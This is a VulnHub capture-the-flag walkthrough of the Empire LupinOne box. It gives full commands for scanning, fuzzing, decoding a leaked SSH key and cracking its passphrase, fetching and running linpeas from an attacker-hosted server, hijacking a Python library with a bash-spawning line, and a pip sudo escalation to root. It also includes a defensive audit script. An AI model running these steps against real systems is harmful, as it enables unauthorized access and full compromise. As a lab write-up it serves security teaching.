EMPIRE CTF: LUPINONE VulnHub Walkthrough | Writeup

SHAMS UL MEHMOOD
8 min read · Jun 5, 2024


Hello friends, I'm Shams Ul Mehmood and this is my 6th article. This article is a full walkthrough of the Empire LupinOne box. It covers several techniques: enumeration, network scanning, fuzzing for hidden files, decoding an SSH key, Python library hijacking and privilege escalation. You can download this VulnHub box from here.

Pentesting Methodology

  1. Getting the target machine IP address by using arp-scan
  2. Getting open port details by using the Nmap tool
  3. Enumerating the HTTP service with the Nikto / Gobuster utilities
  4. Fuzzing for hidden files with FFUF
  5. Decoding the SSH key from Base58
  6. Cracking the SSH key passphrase with John the Ripper
  7. Logging in over SSH and reading the user flag
  8. Enumerating the target machine with user access
  9. Escalating user privileges to a higher-privileged user
  10. Getting the root flag by exploiting the pip utility

Step-1:

📌️ In the first step, I ran arp-scan to perform a local network scan and find the IP address of the target machine.

Command : sudo arp-scan 192.168.163.0/24

Step-2:

📌️ In the same step, having obtained the target machine's IP address, I ran an Nmap scan against it. I used:

  • -sS : TCP SYN scan of the ports.
  • -sV : detect the version of the service behind each open port.
  • -p- : scan all 65535 TCP ports on the target machine.
  • -sC : run the default NSE scripts.
  • -Pn : skip host discovery and treat the host as up.
  • -O : detect the operating system.

Command : sudo nmap -p- -Pn -O -sV -sC -sS 192.168.163.130

Step-3:

📌 In this step I enumerated the HTTP service by opening the target IP address on port 80 over HTTP in a browser.

Command : http://192.168.204.132:80

📌 I used different tools such as dirb, gobuster and nikto to enumerate interesting hidden files and directories on the target machine.

Command : nikto -h 192.168.163.130

📌 Then I ran gobuster against the target IP address over plain HTTP on port 80; this scan found several directories and files, such as image, manual, robots.txt and javascript.

Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.163.130:80

📌 Next, you can see that directory listing is enabled on the web server.

Command : http://192.168.163.130/image/

📌 Then I found that an Apache 2.4 server was running on the target side by opening the URL below.

Command : http://192.168.163.130/manual/en/index.html

📌 Then I found the robots.txt file; this file tells search-engine crawlers which paths they should not index, so it often lists paths the owner would rather keep quiet.

📌 Next I appended robots.txt to the target IP address in the browser, which revealed a hidden directory named /~myfiles.

Command : http://192.168.163.130/robots.txt

📌 Then I appended the hidden directory (/~myfiles) to the target IP address in the browser, but the result was a 404 error.

Command : http://192.168.163.130/~myfiles/

Step-4:

📌 In this step we use fuzzing to gain some additional information. Using ffuf, we found a directory named secret.

Command : ffuf -u http://192.168.163.130/~FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -c

📌 Take a good look at that secret directory: the author is sharing some information about an SSH private key file belonging to the user "icex64", which we need to fuzz for.

Command : http://192.168.163.130/~secret/

📌 To find that secret private SSH key, we fuzzed once more with ffuf and found a text file (mysecret.txt).

Command : ffuf -u http://192.168.163.130/~secret/.FUZZ -e .py,.java,.php,.dart,.rar,.zip,.txt,.html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -c -ic -fc 403

Step-5:

📌 We opened mysecret.txt in a web browser. It appears to be a private SSH key, but it is encoded. After examining the key closely, we determined that it is Base58-encoded.

📌 I used CyberChef to decode it, which I recommend for all manner of encoding, decoding and encryption tasks and for general CTF use. While the "Magic" recipe usually works, this time I went directly to the "From Base58" operation. The output was icex64's private SSH key.
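The same decoding step in code, as an added example that is not part of the original write-up: a minimal Base58 decoder (the Bitcoin alphabet CyberChef uses by default) plus a sanity check that the decoded bytes look like a PEM-style private key. The sample input below is constructed; the box's real key is not reproduced.

```python
# Bitcoin-style Base58 alphabet: no 0, O, I or l, which is one way to recognise it.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {c: i for i, c in enumerate(ALPHABET)}

def b58decode(text: str) -> bytes:
    """Decode Base58 text to bytes; whitespace (e.g. line breaks) is ignored."""
    num, zeros, seen_nonzero = 0, 0, False
    for ch in text:
        if ch.isspace():
            continue
        if ch not in INDEX:
            raise ValueError(f"not a Base58 character: {ch!r}")
        if ch == "1" and not seen_nonzero:   # leading '1's encode leading zero bytes
            zeros += 1
            continue
        seen_nonzero = True
        num = num * 58 + INDEX[ch]
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    return b"\x00" * zeros + body

def b58encode(data: bytes) -> str:
    """Inverse of b58decode, used here to build the constructed sample."""
    zeros = len(data) - len(data.lstrip(b"\x00"))
    num, out = int.from_bytes(data, "big"), ""
    while num:
        num, rem = divmod(num, 58)
        out = ALPHABET[rem] + out
    return "1" * zeros + out

def looks_like_private_key(blob: bytes) -> bool:
    """Cheap check that the decoded bytes are a PEM-style private key block."""
    return blob.startswith(b"-----BEGIN ") and b"PRIVATE KEY-----" in blob

# Constructed stand-in for mysecret.txt (not a real key).
SAMPLE_KEY = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
              b"constructed-key-body-not-a-real-key\n"
              b"-----END OPENSSH PRIVATE KEY-----\n")
SAMPLE_ENCODED = b58encode(SAMPLE_KEY)

if __name__ == "__main__":
    decoded = b58decode(SAMPLE_ENCODED)
    print(decoded.decode())
    print("looks like a private key:", looks_like_private_key(decoded))
```

To use it on the real file, pass the contents of mysecret.txt to b58decode and write the result to victim_id_rsa.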

📌 Let's put the decoded key into a newly created file, which we will call victim_id_rsa, using nano.

Command : nano victim_id_rsa

📌 Make sure we set the correct permissions with chmod 600 on victim_id_rsa; ssh refuses to use a private key file that other users can read.

Command : chmod 600 victim_id_rsa

Command : cat victim_id_rsa

Step-6:

📌 Then I used ssh2john to turn the encrypted victim_id_rsa file into a hash that John the Ripper can crack.

Command : ssh2john victim_id_rsa

📌 Then I saved the ssh2john output for victim_id_rsa into the hash_password file.

Command : ssh2john victim_id_rsa > hash_password

Command : ls

📌 Then I cracked the SSH key passphrase with John the Ripper.

Command : john --wordlist=/usr/share/wordlists/fasttrack.txt hash_password

📌 We now have everything needed for the SSH login: the icex64 username, the SSH key and the cracked passphrase (P@55w0rd!).

Step-7:

📌 We used the recovered passphrase to log in over SSH as user 'icex64'.

📌 Then we ran the ssh command, which asks for the key's passphrase. Since we already have it, we entered P@55w0rd! to log in to the target machine.

📌 We started exploring the target machine as user 'icex64'.

Command : ls

Command : ssh -i victim_id_rsa icex64@192.168.163.130

Command : whoami

📌 When we checked the contents of the current directory using the ‘ls’ command, we found the first flag of the challenge, which can be seen below.

Command : ls

Command : cat user.txt

Step-8:

📌 We started enumerating the target machine through our SSH user access, running a few commands to gather information about the machine.

📌 After that, we used the 'sudo -l' command to check the sudo permissions of the current user 'icex64'. We identified a Python script owned by another user, 'arsene', that the current user is allowed to run. So let us check the contents of the Python script:

Command : ls -la

Command : sudo -l

Command : cat /home/arsene/heist.py

Step-9:

📌 We started the privilege escalation process. To use the Python library hijacking technique, we first have to find where webbrowser.py is located on disk; that is why we use the linpeas script.

📌 Then, on the target machine's terminal, I ran the command below.

Command : cd /tmp

📌 Then, on the attacker machine (Kali Linux) terminal, I used the commands below.

📌 We simply navigate to the directory that holds linpeas.sh and launch a basic Python HTTP server there.

Command : cd ./Downloads

Command : ls

Command : python -m http.server 80

📌 After moving to the /tmp directory and fetching the linpeas script from the Kali machine with wget, I ran the following commands on the target machine's terminal.

Command : ls

Command : wget 192.168.163.128/linpeas.sh

Command : ls

Command : chmod +x linpeas.sh

Command : ./linpeas.sh

📌 Within seconds we had the location of the Python file (webbrowser.py).

Command : ls -al

Command : nano /usr/lib/python3.9/webbrowser.py

📌 The file is writable by our user, which is exactly what makes the hijack possible. We open it with nano and edit the script so that it spawns /bin/bash when the module is imported:

Command : os.system("/bin/bash")

📌 After all of this effort, we ran sudo with the exact command path listed in the permissions check for icex64, which switches us from icex64 to arsene.

Command : sudo -l

Command : sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

Command : whoami
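From the defender's side, the weakness exploited above is a sudo-runnable script whose imports a low-privileged user can modify. As an added example that is not code from the write-up, the Python audit below statically lists a script's imports, resolves each one in sys.path order and flags the two conditions that enable library hijacking: a module file that a non-root user can change, or a writable directory that Python searches before the real module. The entry point and the trusted_uids parameter are my own naming; on the box it would be called as audit("/home/arsene/heist.py").

```python
import ast
import os
import stat
import sys

def imported_modules(script_path):
    """Top-level module names the script imports (found statically with ast)."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read())
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)

def writable_by_non_root(path, trusted_uids=(0,)):
    """True if a user outside trusted_uids could modify this path."""
    st = os.stat(path)
    return st.st_uid not in trusted_uids or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def locate(name, search_path):
    """Mimic sys.path order: the first name.py or name/__init__.py found wins."""
    for idx, d in enumerate(search_path):
        for cand in (os.path.join(d, name + ".py"), os.path.join(d, name, "__init__.py")):
            if os.path.isfile(cand):
                return cand, idx
    return None, None  # built-in/frozen module: nothing on disk to hijack

def audit(script_path, search_path=None, trusted_uids=(0,)):
    """Return (module, path, reason) findings for every import of the script."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    # Python puts the script's own directory first on sys.path.
    search_path = [script_dir] + list(sys.path[1:] if search_path is None else search_path)
    findings = []
    for name in imported_modules(script_path):
        target, idx = locate(name, search_path)
        if target is None:
            continue
        for d in search_path[:idx]:  # a writable dir here lets anyone drop a shadowing module
            if os.path.isdir(d) and writable_by_non_root(d, trusted_uids):
                findings.append((name, d, "writable directory searched before the real module"))
        if writable_by_non_root(target, trusted_uids):
            findings.append((name, target, "module file itself is writable"))
    return findings
```

On this box the audit would report webbrowser.py under /usr/lib/python3.9 as writable; the fix is restoring root ownership and 0644 permissions on the stdlib files, and the same check belongs in any review of sudo rules that allow running scripts.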

📌 We now have the user arsene. Checking this user's sudo permissions, we found that arsene can execute the pip binary as root without a password. After a few more moments of evaluation, we had the idea of a pip privilege escalation.

Command : sudo -l

📌 We used the GTFOBins instructions for pip to perform the privilege escalation. If the program is allowed to run as superuser by sudo, it keeps its elevated privileges and can be used to access the file system, escalate, or maintain privileged access.

📌 To conduct pip privilege escalation, we only need to run these three commands.

Command : TF=$(mktemp -d)

Command : echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

Command : sudo pip install $TF

Command : id

📌 Finally we have root; simply run the id command to confirm. Having confirmed that we are root, we change directory to /root. Congrats!! We obtained the root flag.

Command : cd /root

Command : ls

Command : cat root.txt

CTF Game Over : I am Root!

\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀

📈⭐🧑‍🎤🎭💯

